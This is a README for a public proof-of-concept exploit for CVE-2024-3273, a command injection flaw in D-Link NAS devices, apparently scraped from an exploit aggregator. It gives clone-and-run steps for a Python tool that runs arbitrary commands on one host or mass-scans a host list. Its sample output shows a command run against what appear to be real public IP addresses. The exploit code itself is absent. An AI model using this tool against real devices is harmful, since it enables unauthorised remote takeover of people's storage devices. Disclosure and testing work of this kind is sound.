## https://sploitus.com/exploit?id=28504CB2-A520-5031-BEFD-56B997437166
# CVE-2024-3273 Proof of Concept (PoC)
This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
## Description
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the `cgi-bin/nas_sharing.cgi` endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
## Requirements
- Python 3.x
- `requests` library
## Usage
1. Clone this repository:
```bash
git clone https://github.com/adhikara13/CVE-2024-3273.git
```
2. Navigate to the repository directory:
```bash
cd CVE-2024-3273
```
3. Run the PoC:
```bash
python main.py
```
4. Follow the on-screen instructions to choose the target device:
- **Option 1: Single Host (1)**: Enter details for a single target device, including the host IP address and command to run.
- **Option 2: Multiple Hosts (2)**: Provide a file containing multiple target devices in the format `host:port`, and choose whether to export vulnerable hosts to `vulnerables.txt`.
## Example
```
โโโโโโ โโโโโโโโ โโโโโโโโ
โ โโโฃ โโโโโโซโโโโโโ โซโโ โ โซ
โโโโโโ โโโโโโโโ โโโโ โนโโ
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
โโโโโโ โโโโโโโโ โโโโโโโโ
โ โโโฃ โโโโโโซโโโโโโ โซโโ โ โซ
โโโโโโ โโโโโโโโ โโโโ โนโโ
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
```
## Disclaimer
This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.
## Contributing
Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.